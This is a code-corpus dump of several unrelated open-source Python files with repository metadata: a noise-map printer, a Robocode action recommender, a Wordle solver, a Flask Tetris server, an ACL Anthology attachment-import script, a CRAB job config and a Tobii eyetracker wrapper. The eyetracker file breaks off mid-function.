vaults = oci.pagination.list_call_get_all_results(self.client.list_vaults, compartment_id=compartment_id).data
# Convert to Json object
vaults_json = self.toJson(vaults)
logger.debug(str(vaults_json))
# Filter results
self.vaults_json = self.filterJsonObjectList(vaults_json, filter)
logger.debug(str(self.vaults_json))
return self.vaults_json
| 32.396226
| 118
| 0.631916
|
aeb629a1f8eb6e293971ff976d205dfe5f33e9da
| 331
|
py
|
Python
|
projects/noise/random_noise.py
|
JonasKoenig/CodeOnMyMind
|
d169a424f29d603f0510f98d265d68c26a333a6b
|
[
"MIT"
] | 3
|
2019-02-20T22:01:37.000Z
|
2022-03-02T20:06:16.000Z
|
projects/noise/random_noise.py
|
JonasKoenig/CodeOnMyMind
|
d169a424f29d603f0510f98d265d68c26a333a6b
|
[
"MIT"
] | null | null | null |
projects/noise/random_noise.py
|
JonasKoenig/CodeOnMyMind
|
d169a424f29d603f0510f98d265d68c26a333a6b
|
[
"MIT"
] | null | null | null |
import numpy as np
size = 32
np.random.seed(42)
# normalized random noise map
map = np.random.rand(size,size)
# pretty print
shades = [' ', '░░', '▒▒', '▓▓', '██']
string = ''
for y in range(0,size):
for x in range(0,size):
string += shades[int(np.floor(map[y][x]*(len(shades))))]
string += '\n'
print(string)
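# A small, hypothetical helper equivalent to the shade lookup above, with an
# explicit clamp. np.random.rand() never returns 1.0, so the loop above is
# safe as written, but the clamp matters if the map ever comes from data that
# can reach exactly 1.0.
def to_shade(value):
    return shades[min(int(value * len(shades)), len(shades) - 1)]
# print(''.join(to_shade(v) for v in [0.0, 0.3, 0.6, 0.99]))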
| 18.388889
| 64
| 0.577039
|
faf5ac080eff7d959686146df2863ac76246c818
| 7,800
|
py
|
Python
|
python/recommender.py
|
mpab/RobocodeML
|
30edd0395df54ef5a035cbecb70eddf2eb3a99ac
|
[
"Apache-2.0"
] | 1
|
2020-11-20T23:02:05.000Z
|
2020-11-20T23:02:05.000Z
|
python/recommender.py
|
mpab/RobocodeML
|
30edd0395df54ef5a035cbecb70eddf2eb3a99ac
|
[
"Apache-2.0"
] | 1
|
2022-03-04T04:16:56.000Z
|
2022-03-04T04:16:56.000Z
|
python/recommender.py
|
mpab/RobocodeML
|
30edd0395df54ef5a035cbecb70eddf2eb3a99ac
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import random
import io
import copy
import util
import observations
import cfg
import models
import extractor
import features
import datasets
model_name = 'AdaBoost'
# features_classification_filter = 'pure_boolean_classified'
# target_filter = 'enemy_collisions'
__classification_metamodels__ = [None]
num_actions = 5
def make_key(features_classification, target_name):
return features_classification + '_' + model_name + '_' + target_name
def model_path(features_classification, target_name):
path = '../data/models/' + features_classification + '/' + model_name + '/' + target_name
# print(path)
return path
def classification_models():
if __classification_metamodels__[0] is not None:
return __classification_metamodels__[0]
print('loading models')
classification_metamodels = {}
for features_classification in cfg.features_classes:
for target_name in cfg.onehot_targets:
mm = models.load(model_path(features_classification, target_name))
key = make_key(features_classification, target_name)
classification_metamodels[key] = mm
__classification_metamodels__[0] = classification_metamodels
return __classification_metamodels__[0]
def select_classification_metamodel(features_classification, target_name):
key = make_key(features_classification, target_name)
return classification_models()[key]
def test_select_classification_metamodel():
for features_class in cfg.features_classes:
for target in cfg.onehot_targets:
mdl = select_classification_metamodel(features_class, target)
print('features_class: {}, target: {}, model: {}'.format(features_class, target, mdl.name))
def model(feat_class_filt, target_name):
return select_classification_metamodel(feat_class_filt, target_name).model
def randomized_actions():
indices = random.sample(range(1, num_actions + 1), num_actions)
for idx in indices:
yield idx
def create_features_test_dataset(feat_class_filt, feat, target_name):
csv_data = features.header()
record = extractor.extract(feat_class_filt, feat)
if record is None:
raise RuntimeError("no feature converter for features_class: {}".format(feat_class_filt))
test_features = []
for action in randomized_actions():
test_feature = copy.copy(record)
test_feature.action = action
test_features.append(test_feature)
csv_data += '\n'
csv_data += features.to_string(test_feature)
data_fp = io.StringIO(csv_data)
ds = datasets.from_csv(data_fp, cfg.onehot_targets, target_name)
return ds, test_features
def predict(obs, feat_class_filt, target_name):
pure_pure = features.observation_to_features(obs)
if pure_pure is None:
raise RuntimeError("failed to convert observation to features")
ds, test_features = create_features_test_dataset(feat_class_filt, pure_pure, target_name)
mdl = model(feat_class_filt, target_name)
predictions = mdl.predict(ds.data)
return predictions, ds.data, test_features
def random_recommendation(obs):
action = random.randint(1, 5)
obs.action = action
return obs
def randomize_predictions(predictions):
np = len(predictions)
    indices = random.sample(range(np), np)
for idx in indices:
yield predictions[idx]
def min_max(obs, feat_class_filt, target_name):
predictions, _, test_features = predict(obs, feat_class_filt, target_name)
lowest = 99999
highest = -1
for idx, p in enumerate(predictions):
if p < lowest:
lowest = p
min_feat = test_features[idx]
if p > highest:
highest = p
max_feat = test_features[idx]
return lowest, min_feat, highest, max_feat
def xminimise(obs, feat_class_filt, target_name):
lowest, min_feat, highest, max_feat = min_max(obs, feat_class_filt, target_name)
obs.action = min_feat.action
print("minimise {} recommendation: {} ({})".format(target_name, obs.action, lowest))
print("{}/{})".format(predictions, features.to_string(feat)))
return lowest, highest
def minimise(obs, feat_class_filt, target_name):
predictions, _, test_features = predict(obs, feat_class_filt, target_name)
lowest = 99999
for idx, p in enumerate(predictions):
if p < lowest:
lowest = p
feat = test_features[idx]
obs.action = feat.action
# print("minimise {} recommendation: {} ({})".format(target_name, obs.action, lowest))
# print("{}/{})".format(predictions, features.to_string(feat)))
return lowest
def maximise(obs, feat_class_filt, target_name):
predictions, _, test_features = predict(obs, feat_class_filt, target_name)
highest = -1
for idx, p in enumerate(predictions):
if p > highest:
highest = p
feat = test_features[idx]
obs.action = feat.action
# print("maximise {} recommendation: {} ({})".format(target_name, obs.action, highest))
# print("{}/{})".format(predictions, features.to_string(feat)))
return highest
def minimise_enemy_collisions(obs):
return minimise(obs, 'scaled_pure', 'enemy_collisions')
def minimise_wall_collisions(obs):
return minimise(obs, 'scaled_pure', 'wall_collisions')
def minimise_shell_wounds(obs):
return minimise(obs, 'scaled_pure', 'shell_wounds')
def maximise_shell_intercepts(obs):
return maximise(obs, 'scaled_pure', 'shell_intercepts')
def maximise_shell_hits(obs):
return maximise(obs, 'scaled_pure', 'shell_hits')
def recommend(obs):
lowest = minimise_wall_collisions(obs)
return lowest
def test_recommendations_from_observations():
obs_fp = cfg.ensure_fp(cfg.observations_root, cfg.observations)
print("recommending from: {}".format(obs_fp))
obs_list = util.csv_to_json(obs_fp)
print('-------------------- PREDICTIONS --------------------')
for idx, jsn in enumerate(obs_list):
obs = observations.json_to_observation(jsn)
for feat_class_filt in cfg.features_classes:
for target in cfg.onehot_targets:
predictions, _, test_features = predict(obs, feat_class_filt, target)
found = False
n = predictions[0]
for t in predictions:
if found:
continue
if n != t:
print("{}: target={}, feat_class_filt={}, predictions={}".format(
idx, target, feat_class_filt, predictions))
for f in test_features:
print(features.to_string(f))
found = True
continue
def test_recommenders():
obs_fp = cfg.ensure_fp(cfg.observations_root, cfg.observations)
print("recommending from: {}".format(obs_fp))
obs_list = util.csv_to_json(obs_fp)
print('-------------------- RECOMMENDATIONS --------------------')
for idx, jsn in enumerate(obs_list):
print('observation: {}'.format(idx))
obs = observations.json_to_observation(jsn)
minimise_enemy_collisions(obs)
minimise_wall_collisions(obs)
minimise_shell_wounds(obs)
maximise_shell_intercepts(obs)
maximise_shell_hits(obs)
def test_randomized_actions():
for _ in range(10000):
for idx in randomized_actions():
if idx < 1 or idx > num_actions:
raise RuntimeError('randomized_actions: {}'.format(idx))
print('randomized_actions passed')
def main():
test_randomized_actions()
test_recommenders()
# test_recommendations_from_observations()
if __name__ == "__main__":
main()
| 30.46875
| 103
| 0.673205
|
e918f242dfe8182e33a9f179d04d1048689b8118
| 2,062
|
py
|
Python
|
solve_state.py
|
imVincentTan/wordle-solver
|
b57d5ec9d2d6426d05449b9230a08405040b4b19
|
[
"MIT"
] | null | null | null |
solve_state.py
|
imVincentTan/wordle-solver
|
b57d5ec9d2d6426d05449b9230a08405040b4b19
|
[
"MIT"
] | null | null | null |
solve_state.py
|
imVincentTan/wordle-solver
|
b57d5ec9d2d6426d05449b9230a08405040b4b19
|
[
"MIT"
] | null | null | null |
from math import log2
from hints_calculator import HintsCalculator
from tools import Tools
class SolveState(Tools):
def __init__(self, possible_letters, number_of_characters, valid_words) -> None:
self.possible_letters = possible_letters
self.number_of_characters = number_of_characters
self.valid_input_words = valid_words
self.possible_final_answers = valid_words
def get_submission_hints(self, input_word, target_word):
hints_calculator = HintsCalculator(input_word, target_word)
return hints_calculator.get_hints()
def get_sorted_word_to_expected_score(self):
# TODO: improve algorithm to be faster
word_score_pairs = []
for input_word in self.valid_input_words:
word_score_pairs.append([input_word, self.get_expected_score(input_word)])
word_score_pairs.sort(key=lambda x: x[1], reverse=True)
return word_score_pairs
def get_expected_score(self, input_word):
hint_pattern_to_frequency_map = self.get_hint_pattern_to_frequency_map(input_word)
score = 0
for key in hint_pattern_to_frequency_map:
score += self.get_score_gained_by_occurrences(hint_pattern_to_frequency_map[key])
return score
def get_score_gained_by_occurrences(self, occurrences):
probability_of_hint = occurrences / self.get_number_of_valid_inputs()
weight = log2(1/probability_of_hint)
return probability_of_hint * weight
def get_number_of_valid_inputs(self):
return len(self.valid_input_words)
def get_hint_pattern_to_frequency_map(self, input_word):
hint_pattern_to_frequency_map = {}
for target_word in self.valid_input_words:
hint_pattern = self.get_submission_hints(input_word, target_word)
if hint_pattern in hint_pattern_to_frequency_map:
hint_pattern_to_frequency_map[hint_pattern] += 1
else:
hint_pattern_to_frequency_map[hint_pattern] = 1
return hint_pattern_to_frequency_map
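# A standalone sketch (assumed counts, not real game data) of the expected
# information score computed above: each hint pattern contributes
# p * log2(1/p) bits, so guesses that split the remaining answers more evenly
# score higher.
if __name__ == "__main__":
    hint_counts = {"GGYXX": 3, "XXXXX": 5, "YYXXX": 2}
    total = sum(hint_counts.values())
    expected_bits = sum((n / total) * log2(total / n) for n in hint_counts.values())
    print(round(expected_bits, 3))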
| 41.24
| 93
| 0.730844
|
7bae862657f38a00a09cbf95a98e2e374da89758
| 4,169
|
py
|
Python
|
tetris-server/app.py
|
OrhanKupusoglu/docker-tetris
|
42f70431e686264f8dd66e7d419674b7271a66e6
|
[
"MIT"
] | 9
|
2018-04-06T23:10:59.000Z
|
2022-01-21T01:04:51.000Z
|
tetris-server/app.py
|
OrhanKupusoglu/docker-tetris
|
42f70431e686264f8dd66e7d419674b7271a66e6
|
[
"MIT"
] | null | null | null |
tetris-server/app.py
|
OrhanKupusoglu/docker-tetris
|
42f70431e686264f8dd66e7d419674b7271a66e6
|
[
"MIT"
] | 5
|
2019-09-18T22:04:35.000Z
|
2022-01-04T20:27:37.000Z
|
"""
Tetris Server
Flask:
http://flask.pocoo.org/
Tetris:
https://github.com/ytiurin/tetris
"""
import os
import uuid
import time
import logging
import logging.handlers
import json
from flask import (
abort,
Flask,
request,
Response,
session,
g,
jsonify,
redirect,
url_for,
render_template,
flash,
)
# APP
app = Flask(__name__, static_folder='static', static_url_path='')
app.config.update(dict(
SECRET_KEY = str(uuid.uuid4()),
LOG_ENABLED = True,
LOG_LEVEL = 'INFO',
LOG_FILE = 'tetris-server/static/log/server.txt',
LOG_MAX_BYTES = 1024 * 1024,
LOG_BACKUP_COUNT = 10,
SHUTDOWN_IF_LOCALHOST_ONLY = True
))
app.config.from_envvar('TETRIS_SERVER_SETTINGS', silent=True)
# LOGGER
if app.config['LOG_ENABLED']:
logHandler = logging.handlers.RotatingFileHandler(app.config['LOG_FILE'],
maxBytes=app.config['LOG_MAX_BYTES'],
backupCount=app.config['LOG_BACKUP_COUNT'])
logHandler.setFormatter(logging.Formatter("[%(asctime)s] %(levelname)s - %(message)s"))
if app.config['LOG_LEVEL'] == 'DEBUG':
app.logger.setLevel(logging.DEBUG)
elif app.config['LOG_LEVEL'] == 'INFO':
app.logger.setLevel(logging.INFO)
elif app.config['LOG_LEVEL'] == 'WARNING':
app.logger.setLevel(logging.WARNING)
elif app.config['LOG_LEVEL'] == 'ERROR':
app.logger.setLevel(logging.ERROR)
elif app.config['LOG_LEVEL'] == 'CRITICAL':
app.logger.setLevel(logging.CRITICAL)
app.logger.addHandler(logHandler)
logging.getLogger('werkzeug').addHandler(logHandler)
with open(app.config['LOG_FILE'], 'a') as log_file:
log_file.write('\n' + 80*'-' + '\n\n')
else:
app.logger.disabled = True
logging.getLogger('werkzeug').disabled = True
app.logger.info('Application started')
# HELPER FUNCTIONS
def is_localhost():
remote_addr = request.environ['REMOTE_ADDR']
app.logger.info('request - remote addr = {}'.format(remote_addr))
return remote_addr == '127.0.0.1' or remote_addr == '::1'
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('not running with the Werkzeug Server')
func()
# ROUTES
@app.route('/')
def show_root():
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
return redirect(url_for('show_game'))
@app.route('/tetris')
def show_game():
return redirect(url_for('get_game', file='index.html'))
@app.route('/tetris/<path:file>')
def get_game(file):
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
return app.send_static_file('tetris/' + file)
@app.route('/log')
def show_log():
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
return app.send_static_file('log/server.txt')
@app.route('/shutdown', methods=['POST'])
def shutdown():
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
if app.config['SHUTDOWN_IF_LOCALHOST_ONLY']:
if not is_localhost():
abort(401)
shutdown_server()
return 'Service shutting down...'
# ERRORS
@app.errorhandler(401)
def unauthorized(error=None):
message = {'status': 401,
'message': 'Unauthorized',
'url': request.url}
resp = jsonify(message)
resp.status_code = 401
return resp
@app.errorhandler(404)
def not_found(error=None):
message = {'status': 404,
'message': 'Not Found',
'url': request.url}
resp = jsonify(message)
resp.status_code = 404
return resp
@app.errorhandler(500)
def internal_server_error(error=None):
message = {'status': 500,
'message': 'Internal Server Error',
'url': request.url}
resp = jsonify(message)
resp.status_code = 500
return resp
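# RUN (an assumption: the original project appears to start the server through
# an external runner, so this guard is only an illustrative way to launch the
# app directly for local testing)
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000)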
| 27.427632
| 125
| 0.637083
|
1390237717c3ef8fd76398e6ce5c5dea7908a60b
| 9,790
|
py
|
Python
|
bin/add_attachments.py
|
mardub1635/acl-anthology
|
448c9d8919736c7493e57af505dfb06cf11dc43a
|
[
"Apache-2.0"
] | null | null | null |
bin/add_attachments.py
|
mardub1635/acl-anthology
|
448c9d8919736c7493e57af505dfb06cf11dc43a
|
[
"Apache-2.0"
] | null | null | null |
bin/add_attachments.py
|
mardub1635/acl-anthology
|
448c9d8919736c7493e57af505dfb06cf11dc43a
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019 Matt Post <post@cs.jhu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Used to add attachments to the Anthology.
Usage:
add_attachments.py CSV_FILE
Where CSV_FILE is output from the Microsoft form (https://forms.office.com/Pages/ResponsePage.aspx?id=DQSIkWdsW0yxEjajBLZtrQAAAAAAAAAAAAMAABqTSThUN0I2VEdZMTk4Sks3S042MVkxUEZQUVdOUS4u) we use to collect attachments, and has the following headers:
ID,Start time,Completion time,Email,Name,Anthology ID,URL where we can download the attachment,Attachment type,"For corrections or errata, please explain in detailed prose what has changed.",Your name,Your email address,I agree to the Anthology's CC-BY-4.0 distribution license.
Downloads the files, edits the XML, and dumps a log to
add_attachments.log, along with emails to be sent to those whose
imports failed.
"""
import argparse
import csv
import filetype
import os
import shutil
import ssl
import sys
import tempfile
from anthology.utils import build_anthology_id, deconstruct_anthology_id, indent
import lxml.etree as ET
import urllib.request
ALLOWED_TYPES = ["pdf", "pptx", "zip"]
ATTACHMENT_TYPES = "Poster Presentation Note Software Supplementary Dataset".split()
def add_attachment(anthology_id, path, attach_type, overwrite=False):
"""
Adds a single attachment to the Anthology data files.
Arguments:
- The ACL ID of the paper (e.g., P17-1012)
- The path to the attachment (can be a URL)
- The attachment type (poster, presentation, note, software)
- Whether to overwrite the downloaded file.
"""
collection_id, volume_id, paper_id = deconstruct_anthology_id(anthology_id)
if path.startswith("http"):
_, input_file_path = tempfile.mkstemp()
try:
print(
f"-> Downloading file from {path} to {input_file_path}", file=sys.stderr
)
request = urllib.request.Request(path, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(request) as url, open(
input_file_path, mode="wb"
) as input_file_fh:
input_file_fh.write(url.read())
except ssl.SSLError:
raise Exception(f"Could not download {path}")
except Exception as e:
raise e
else:
input_file_path = path
file_extension = path.replace("?dl=1", "").split(".")[-1]
# Many links from file sharing services are not informative and don't have
# extensions, so we could try to guess.
if file_extension not in ALLOWED_TYPES:
detected = filetype.guess(input_file_path)
if detected is not None:
file_extension = detected.mime.split("/")[-1]
if file_extension not in ALLOWED_TYPES:
print(
f"Could not determine file extension for {anthology_id} at {path}",
file=sys.stderr,
)
# Update XML
xml_file = os.path.join(
os.path.dirname(sys.argv[0]), "..", "data", "xml", f"{collection_id}.xml"
)
tree = ET.parse(xml_file)
attachment_file_name = f"{anthology_id}.{attach_type}.{file_extension}"
paper = tree.getroot().find(f"./volume[@id='{volume_id}']/paper[@id='{paper_id}']")
if paper is not None:
# Check if attachment already exists
for attachment in paper.findall("attachment"):
if attachment.text == attachment_file_name:
print(
f"-> attachment {attachment_file_name} already exists in the XML",
file=sys.stderr,
)
break
else:
attachment = ET.Element("attachment")
attachment.attrib["type"] = attach_type.lower()
attachment.text = attachment_file_name
paper.append(attachment)
indent(tree.getroot())
tree.write(xml_file, encoding="UTF-8", xml_declaration=True)
print(
f"-> added attachment {attachment_file_name} to the XML", file=sys.stderr
)
else:
print(f"Paper {anthology_id} not found in the Anthology", file=sys.stderr)
# Make sure directory exists
output_dir = os.path.join(args.attachment_root, collection_id[0], collection_id)
if not os.path.exists(output_dir):
# print(f"-> Creating directory {output_dir}", file=sys.stderr)
os.makedirs(output_dir)
# Copy file
dest_path = os.path.join(output_dir, attachment_file_name)
if os.path.exists(dest_path) and not overwrite:
print(
f"-> target file {dest_path} already in place, refusing to overwrite",
file=sys.stderr,
)
return None
shutil.copy(input_file_path, dest_path)
os.chmod(dest_path, 0o644)
print(f"-> copied {input_file_path} to {dest_path} and fixed perms", file=sys.stderr)
# Clean up
if path.startswith("http"):
os.remove(input_file_path)
return dest_path
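# Illustrative direct call (hypothetical values; note that the function reads the global
# `args.attachment_root` set in __main__, so it is normally driven through main()):
#
#     add_attachment("P17-1012", "https://example.com/P17-1012.Poster.pdf", "Poster", overwrite=False)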
def main(args):
attachments = {}
with open(args.csv_file) as csv_file:
for row in csv.DictReader(csv_file):
# ID,Start time,Completion time,Email,Name,Anthology ID,URL where we can download the attachment,Attachment type,"For corrections or errata, please explain in detailed prose what has changed.",Your name,Your email address,I agree to the Anthology's CC-BY-4.0 distribution license
anthology_id = row["Anthology ID"].strip()
download_path = row["URL"]
attachment_type = row["Attachment type"]
submitter_name = row["Your name"]
submitter_email = row["Your email address"]
submitted = row["Completion time"]
if attachment_type not in ATTACHMENT_TYPES:
print(
f"{anthology_id}: Skipping unknown type {attachment_type}: {download_path}",
file=sys.stderr,
)
continue
if anthology_id in attachments:
print(
f"{anthology_id}: Received multiple entries, only processing the last one ({attachment_type}): {download_path}",
file=sys.stderr,
)
attachments[anthology_id] = (
download_path,
attachment_type,
submitter_name,
submitter_email,
submitted,
)
succeeded = 0
failed = 0
with open(args.logfile, "a") as log:
for anthology_id, (path, attach_type, name, email, date) in attachments.items():
try:
print(f"Processing attachment for {anthology_id}", file=sys.stderr)
success = add_attachment(
anthology_id, path, attach_type, overwrite=args.overwrite
)
if success:
succeeded += 1
print(f"{anthology_id}: SUCCESS.", file=log)
else:
print(f"{anthology_id}: ALREADY DONE (use -o to redo).", file=log)
except Exception as reason:
failed += 1
print(f"{anthology_id}: FAILURE", file=log)
with open(f"{args.logfile}.{anthology_id}.txt", "w") as email_log:
print(
f"{email}\n"
f"ACL Anthology: failed to add attachment for {anthology_id}\n"
f"Dear {name},\n"
f"\n"
f"On {date} you submitted the following attachment to the ACL Anthology\n"
f"\n"
f" paper ID: {anthology_id}\n"
f" link: {path}\n"
f"\n"
f"Adding this attachment failed. The reason reported was:\n"
f"\n"
f" {reason}\n"
f"\n"
f"To resubmit, follow the instructions here:\n"
f"\n"
f" https://www.aclweb.org/anthology/info/corrections/\n",
f"\n"
f"There is no need to respond to this email.\n"
f"\n"
f"Sincerely,\n"
f"Matt Post\n"
f"Anthology Director\n",
file=email_log,
)
print(
f"Processed {len(attachments)} attachments ({succeeded} succeeded, {failed} failed)."
)
print(f"Wrote logfile to {args.logfile}.")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("csv_file", help="The CSV file from the Microsoft form")
parser.add_argument(
"--overwrite", "-o", action="store_true", help="Overwrite attachments"
)
parser.add_argument(
"--logfile", "-l", default="add_attachments.log", help="Logfile to write to"
)
parser.add_argument(
"--attachment-root",
"-d",
default=os.path.join(os.environ["HOME"], "anthology-files/attachments"),
help="Anthology web directory root.",
)
args = parser.parse_args()
main(args)
| 38.543307
| 291
| 0.594382
|
b4af888c05052c270fcf9a0f7a3024ae77bb61fa
| 1,627
|
py
|
Python
|
Kai/crab/NANOv7_NoveCampaign/2018/crab_cfg_2018_tt_DL-GF.py
|
NJManganelli/FourTopNAOD
|
9743d5b49bdbad27a74abb7b2d5b7295f678a0e3
|
[
"Apache-2.0"
] | 1
|
2022-01-17T17:29:38.000Z
|
2022-01-17T17:29:38.000Z
|
Kai/crab/NANOv7_NoveCampaign/2018/crab_cfg_2018_tt_DL-GF.py
|
NJManganelli/FourTopNAOD
|
9743d5b49bdbad27a74abb7b2d5b7295f678a0e3
|
[
"Apache-2.0"
] | null | null | null |
Kai/crab/NANOv7_NoveCampaign/2018/crab_cfg_2018_tt_DL-GF.py
|
NJManganelli/FourTopNAOD
|
9743d5b49bdbad27a74abb7b2d5b7295f678a0e3
|
[
"Apache-2.0"
] | 1
|
2021-12-15T10:56:50.000Z
|
2021-12-15T10:56:50.000Z
|
import os
from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromCRIC
config = Configuration()
config.section_("General")
config.General.requestName = '2018_tt_DL-GF'
config.General.transferOutputs = True
config.General.transferLogs = True
config.section_("JobType")
config.JobType.allowUndistributedCMSSW = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'crab_PSet_2018_tt_DL-GF.py'
config.JobType.maxMemoryMB = 3000
config.JobType.maxJobRuntimeMin = 1315
config.JobType.numCores = 1
config.JobType.scriptExe = 'crab_script_2018_tt_DL-GF.sh'
config.JobType.inputFiles = ['crab_script_2018_tt_DL-GF.py',
os.path.join(os.environ['CMSSW_BASE'],'src/PhysicsTools/NanoAODTools/scripts/haddnano.py'),
]
config.JobType.outputFiles = [] #['hist.root']
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/TTTo2L2Nu_HT500Njet7_TuneCP5_13TeV-powheg-pythia8/RunIIAutumn18NanoAODv7-Nano02Apr2020_102X_upgrade2018_realistic_v21-v1/NANOAODSIM'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
if config.Data.splitting == 'FileBased':
config.Data.unitsPerJob = 1
# config.Data.totalUnits = $TOTAL_UNITS
# config.Data.userInputFiles = []
# config.Data.outLFNDirBase = '/store/user/{user}/NoveCampaign'.format(user=getUsernameFromCRIC())
config.Data.outLFNDirBase = '/store/group/fourtop/NoveCampaign'
config.Data.publication = True
config.Data.outputDatasetTag = 'NoveCampaign'
config.section_("Site")
config.Site.storageSite = 'T2_BE_IIHE'
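# Typical submission with the CRAB3 client (assuming a CMSSW environment and a valid grid proxy):
#     crab submit -c crab_cfg_2018_tt_DL-GF.py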
| 40.675
| 161
| 0.777505
|
3afc862a4da7214a8d147df8ed03e28da80b06e7
| 60,851
|
py
|
Python
|
tobii_pro_wrapper/tobii_pro_wrapper.py
|
anthonycrane/tobii_pro_wrapper
|
65292966f2b3a9ec9bef0382878a397406ec974d
|
[
"Apache-2.0"
] | null | null | null |
tobii_pro_wrapper/tobii_pro_wrapper.py
|
anthonycrane/tobii_pro_wrapper
|
65292966f2b3a9ec9bef0382878a397406ec974d
|
[
"Apache-2.0"
] | null | null | null |
tobii_pro_wrapper/tobii_pro_wrapper.py
|
anthonycrane/tobii_pro_wrapper
|
65292966f2b3a9ec9bef0382878a397406ec974d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Psychopy supported Tobii controller for the new Pro SDK
# Authors: Olivia Guayasamin
# Date: 8/3/2017
# Requirements: Python 2.7 32 Bit (SDK required)
# Tobii Pro SDK 1.0 for Python, and all dependencies
# Psychopy, Psychopy.iohub, and all dependencies
# numpy, scipy, and win32api
# Summary: Currently provides all functionality for running a FULL CALIBRATION
# ROUTINE for 5 and 9 point calibrations, and converting between Tobii
# Trackbox, Tobii ADA, and Psychopy coordinate systems.
# This code also contains functionality for finding/calibrating the
# experimental monitor, connecting to keyboard/mouse devices, selecting and
# connecting to a tobii device, getting tobii device parameters, and getting
# real time gaze and eye position data from the tobii tracker.
# Notes: This code is currently designed for working with a tobii eyetracker
# installed on the same device as the one for running experiments (laptop set-
# up with a single connected eyetracker, no external monitors, and no tobii
# external processors). It should be straightforward to adapt to other
# computer/monitor set-ups, but adaptation is required. Created on Windows OS.
# Not guaranteed.
# Please contact for questions. This will be updated as more functionality is
# added.
# -----Import Required Libraries-----
import pyglet
from psychopy import core as pcore
from psychopy import monitors, visual, gui, data, event
from psychopy.iohub import launchHubServer
import datetime as dt
import numpy as np
from scipy.spatial import distance
import tobii_research as tobii
import collections
# -----Class for working with Tobii Eyetrackers -----
class TobiiHelper:
def __init__(self):
self.eyetracker = None
self.adaCoordinates = {}
self.tbCoordinates = {}
self.calibration = None
self.tracking = False
self.win = None
self.gazeData = {}
self.syncData = {}
self.currentOutData = {}
# ----- Functions for initializing the eyetracker and class attributes -----
# find and connect to a tobii eyetracker
def findTracker(self, serialString = None):
# try to find all eyetrackers
allTrackers = tobii.find_all_eyetrackers()
# if there are no eyetrackers
if len(allTrackers) < 1:
raise ValueError("Cannot find any eyetrackers.")
# if there is no serialString specified, use first found eyetracker
if serialString is None:
# use first found eyetracker
eyetracker = allTrackers[0]
address = eyetracker.address
print("Address: " + eyetracker.address)
print("Model: " + eyetracker.model)
print("Name: " + eyetracker.device_name)
print("Serial number: " + eyetracker.serial_number)
# create eyetracker object
self.eyetracker = tobii.EyeTracker(address)
# if serial number is not given as a string
elif not isinstance(serialString, basestring):
raise TypeError("Serial number must be formatted as a string.")
# if serial number is given as a string
else:
# get information about available eyetrackers
for eyetracker in allTrackers:
if eyetracker.serial_number == serialString:
address = eyetracker.address
print("Address: " + eyetracker.address)
print("Model: " + eyetracker.model)
# fine if name is empty
print("Name: " + eyetracker.device_name)
print("Serial number: " + eyetracker.serial_number)
# create eyetracker object
self.eyetracker = tobii.EyeTracker(address)
# check to see that eyetracker is connected
if self.eyetracker is None:
print("Eyetracker did not connect. Check serial number?")
else:
print("Eyetracker connected successfully.")
# function for getting trackbox (tb) and active display area (ada) coordinates; returns
# coordinates in two separate dictionaries with values in mm
def getTrackerSpace(self):
# check to see that eyetracker is connected
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
# get active display area information in mm as a dictionary
displayArea = self.eyetracker.get_display_area()
self.adaCoordinates['bottomLeft'] = displayArea.bottom_left
self.adaCoordinates['bottomRight'] = displayArea.bottom_right
self.adaCoordinates['topLeft'] = displayArea.top_left
self.adaCoordinates['topRight'] = displayArea.top_right
self.adaCoordinates['height'] = displayArea.height
self.adaCoordinates['width'] = displayArea.width
# get track box information in mm, return only the 2d coordinates
# of the cube side closest to the eyetracker
trackBox = self.eyetracker.get_track_box()
self.tbCoordinates['bottomLeft'] = trackBox.front_lower_left
self.tbCoordinates['bottomRight'] = trackBox.front_lower_right
self.tbCoordinates['topLeft'] = trackBox.front_upper_left
self.tbCoordinates['topRight'] = trackBox.front_upper_right
# calculate box height and width
trackBoxHeight = np.absolute(trackBox.front_lower_left[1] -
trackBox.front_upper_right[1])
trackBoxWidth = np.absolute(trackBox.front_lower_left[0] -
trackBox.front_lower_right[0])
self.tbCoordinates['height'] = trackBoxHeight
self.tbCoordinates['width'] = trackBoxWidth
# define and calibrate experimental monitor, set monitor dimensions
def setMonitor(self, nameString = None, dimensions = None):
# find all connected monitors
allMonitors = monitors.getAllMonitors()
# if there are no eyetrackers
if len(allMonitors) < 1:
raise ValueError("Psychopy can't find any monitors.")
# if no dimensions given
if dimensions is None:
# use current screen dimensions
platform = pyglet.window.get_platform()
display = platform.get_default_display()
screen = display.get_default_screen()
dimensions = (screen.width, screen.height)
# if dimension not given as tuple
elif not isinstance(dimensions, tuple):
raise TypeError("Dimensions must be given as tuple.")
# if no monitor name is given, use the first detected monitor
if nameString is None:
# create monitor calibration object
thisMon = monitors.Monitor(allMonitors[0])
print("Current monitor name is: " + allMonitors[0])
# set monitor dimensions
thisMon.setSizePix(dimensions)
# save monitor
thisMon.saveMon() # save monitor calibration
self.win = thisMon
# if monitor name is not given as a string
